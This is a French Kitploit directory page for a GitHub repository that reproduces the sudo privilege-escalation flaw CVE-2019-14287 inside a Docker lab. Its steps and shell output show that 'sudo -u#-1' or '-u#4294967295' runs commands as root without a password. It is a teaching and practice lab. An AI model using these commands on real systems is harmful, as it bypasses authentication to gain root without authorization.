Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
poc-cve-2019-14287 — # PoC basé sur Docker démontrant l'élévation de privilèges sudo CVE-2019-14287 via le contournement de la restriction utilisateur Runas, avec instructions de reproduction étape par étape. | Kitploit
Outils/GitHubGitHub/lemonadern/poc-cve-2019-14287
Escalade de PrivilègesSécurité des ConteneursAnalyse des VulnérabilitésExploitationApprentissage et ÉducationLabs et Pratique
GitHublemonadern/poc-cve-2019-14287

poc-cve-2019-14287

# PoC basé sur Docker démontrant l'élévation de privilèges sudo CVE-2019-14287 via le contournement de la restriction utilisateur Runas, avec instructions de reproduction étape par étape.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
14il y a 1 anPas encore vérifié

PoC of CVE-2019-14287

Aperçu

Exemple de reproduction de la vulnérabilité sudo (CVE-2019-14287) dans un conteneur Docker.

Procédure de l'exercice

  1. Démarrer le conteneur avec docker compose up -d
  2. Entrer dans le conteneur avec docker exec -it vulnerable_sudo_app bash
  3. Exécuter les commandes whoami et id pour vérifier que vous êtes un utilisateur standard (pas root)
    root@kitploit:~
    $ whoami
    user1
    $ id
    uid=1000(user1) gid=1000(user1) groups=1000(user1)
    $ id -u
    1000
    
  4. Vérifier que sudo -u#0 whoami et sudo -u#0 id -u ne peuvent pas être exécutés
    • Exécution avec l'UID 0 (root) spécifié via l'option -u
    • Un mot de passe est demandé, mais comme vous ne le connaissez pas, la commande ne peut pas être exécutée
    root@kitploit:~
    $ sudo -u#0 whoami
    [sudo] password for user1:
    $ sudo -u#0 id
    [sudo] password for user1:
    $ sudo -u#0 id -u
    [sudo] password for user1:
    
  5. Exécuter sudo -u#-1 whoami et sudo -u#-1 id -u pour vérifier que les commandes peuvent être exécutées en tant que root sans authentification (reproduction de la vulnérabilité)
    • La même chose est possible avec -u#4294967295
    root@kitploit:~
    $ sudo -u#-1 whoami
    root
    $ sudo -u#-1 id
    uid=0(root) gid=1000(user1) groups=1000(user1)
    $ sudo -u#-1 id -u
    0
    

Références

  • CVE - CVE-2019-14287
  • Potential bypass of Runas user restrictions | Sudo
  • Résumé de la vulnérabilité sudo (CVE-2019-14287) - Qiita
Télécharger l’outil